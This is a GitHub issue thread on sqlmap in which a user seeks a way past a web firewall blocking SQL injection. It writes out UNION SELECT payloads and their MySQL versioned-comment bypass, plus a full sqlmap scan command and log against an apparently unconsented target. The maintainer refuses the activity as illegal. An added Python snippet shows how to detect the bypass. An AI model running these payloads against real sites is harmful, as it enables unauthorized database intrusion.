sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Filter bypassing #662

Closed italy2010 closed 10 years ago

italy2010 commented 10 years ago

Hello, I have one target with a MySQL SQL injection bug (error-based), but their host seems to block SQL injection attacks, because it gives me this error: 406 Not Acceptable

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

406 Not Acceptable

I checked all tampers but it was not OK. I found one bypass code, but it seems it is not available in sqlmap tampers. Here are 2 examples for bypassing filters:

http://www.hcon.in/4/post/2012/04/sql-injection-tutorial-series-part-1.html
http://rohann1313.blogspot.com/2013/04/advanced-sql-injection-and-firewall.html

Is it possible to add these codes in tampers? Thanks
stamparm commented 10 years ago

Can you please be more specific? Those two links don't make clear what you want. (In reply to italy2010's email of Apr 3, 2014 6:44 AM.)

italy2010 commented 10 years ago

Hi, I talk about this in the first link:

/////////////////////////////////////////

  1. Filter Bypassing
    Generally while doing SQL injection, some SQL keywords are used like union, select, from etc. The administrator filters these keywords so as to block such requests, but it still becomes possible for an attacker to bypass these kinds of filters.

Example: the attacker attacks like this, index.php?id=1 union all select 1,2,3--n and the site gives response 406 Not Acceptable, so by using tricks like this index.php?id=1 /*!union*/ /*!all*/ /*!select*/ 1,2,3-- the attacker bypasses the security. There are many ways to bypass this; it depends on how strongly the administrator has created the filter.

/////////////////////////////////////////

I have one URL for example = http://x2x.net/form/form.php?joBm=1 When sqlmap tries to test SQL parameters the website gives me back error 406 (see part 4 in the first link), so http://x2x.net/form/form.php?joBm=1 And 1=1 or order+by and union all select 1,2,3--n ... and tampers do not work.

But this code works and I don't see any 406 errors: http://x2x.net/form/form.php?joBm=1 /*!union*/ /*!all*/ /*!select*/ 1,2,3-- and this code bypasses the WAF. It seems sqlmap doesn't have this bypass code in tampers, because I checked all of them and they give me back error 406.

If you don't understand me I can give you a private link to the website for checkup.
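As an added example (not code from this thread or from sqlmap), the following shows why a phrase-based keyword rule of the kind described above misses keywords wrapped in MySQL versioned comments, and how normalizing the parameter value before matching closes that gap for detection; the rules and sample values are constructed for illustration, and the durable fix remains parameterized queries rather than input filtering.

```python
import re

# Phrase-based blocklist rules of the kind a simple WAF applies (constructed
# for this example; not a real rule set and not sqlmap code).
NAIVE_RULES = [
    re.compile(r"union\s+(all\s+)?select", re.IGNORECASE),
    re.compile(r"order\s+by", re.IGNORECASE),
    re.compile(r"select\s+.+\s+from", re.IGNORECASE),
]

# MySQL executes the body of a versioned comment /*!...*/ (or /*!50000...*/),
# so the wrapper hides the keyword sequence from a text rule while leaving
# the statement intact for the database.
_VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)
# Plain /* ... */ comments are discarded by MySQL; inline ones split tokens.
_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def naive_filter_blocks(value: str) -> bool:
    """Apply the phrase rules to the raw parameter value."""
    return any(rule.search(value) for rule in NAIVE_RULES)


def normalize(value: str) -> str:
    """Rewrite the value roughly as MySQL will read it: keep the body of
    versioned comments, drop plain comments, collapse whitespace."""
    out = _VERSIONED_COMMENT.sub(r" \1 ", value)
    out = _PLAIN_COMMENT.sub(" ", out)
    return re.sub(r"\s+", " ", out).strip()


def normalized_filter_blocks(value: str) -> bool:
    """Same rules, applied after normalization."""
    return naive_filter_blocks(normalize(value))


# Constructed sample values in the shape discussed in the thread.
SAMPLES = {
    "plain": "1 union all select 1,2,3--",
    "versioned": "1 /*!union*/ /*!all*/ /*!select*/ 1,2,3--",
    "versioned_numbered": "1 /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3--",
    "benign": "1",
}


def compare() -> dict:
    """Return {name: (naive_blocked, normalized_blocked)} for each sample."""
    return {name: (naive_filter_blocks(v), normalized_filter_blocks(v))
            for name, v in SAMPLES.items()}
```

The raw rules block only the plain form, while the normalized check blocks all three injection-shaped samples and still passes the benign value.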

italy2010 commented 10 years ago

OK, I found better info here: http://hackersohail.blogspot.com/2014/03/bypass-web-application-firewalls-web.html which spoke about the "By Replaced Keywords" method to bypass the WAF.

My target can be bypassed with this method.

stamparm commented 10 years ago

--tamper=versionedkeywords

italy2010 commented 10 years ago

It seems OK with this tamper, but I checked with Level 5 / Risk 3, and sqlmap doesn't find an injection.

sqlmap.py -u "http://X2X.COM/form/form.php" --data=" req=2&pid=&send=1" -p pid --dbms mysql --level 5 --risk 3 --dbs --random-agent --tamper=versionedkeywords --technique E

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:57

[12:59:57] [INFO] loading tamper script 'versionedkeywords'
[12:59:57] [WARNING] tamper script 'versionedkeywords' is only meant to be run against MySQL
[12:59:57] [INFO] fetched random HTTP User-Agent header from file 'C:\Users\root\txt\user-agents.txt': Opera/9.25 (Windows NT 5.1; U; lt)
[12:59:57] [INFO] testing connection to the target URL
[12:59:58] [INFO] heuristics detected web page charset 'utf-8'
[12:59:58] [WARNING] heuristic (basic) test shows that POST parameter 'pid' might not be injectable
[12:59:58] [INFO] testing for SQL injection on POST parameter 'pid'
[12:59:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:00:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[13:01:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[13:01:50] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[13:02:30] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[13:03:05] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[13:03:39] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[13:04:17] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[13:04:46] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[13:05:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[13:05:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[13:05:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[13:05:16] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[13:05:19] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[13:05:20] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[13:05:21] [WARNING] POST parameter 'pid' is not injectable
[13:05:21] [CRITICAL] all tested parameters appear to be not injectable. Rerun without providing the option '--technique'. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 13:05:21

stamparm commented 10 years ago

You can debug the issue by inspecting the requests and responses inside the traffic file obtained with -t traffic.txt. When you find what's wrong you can contact back and we'll gladly fix the issue (if it exists).

italy2010 commented 10 years ago

OK. I sent the log file to your Gmail. Thanks.

stamparm commented 10 years ago

Can't help you in illegal activities. You can find what's wrong (with those targets you've sent) and report back.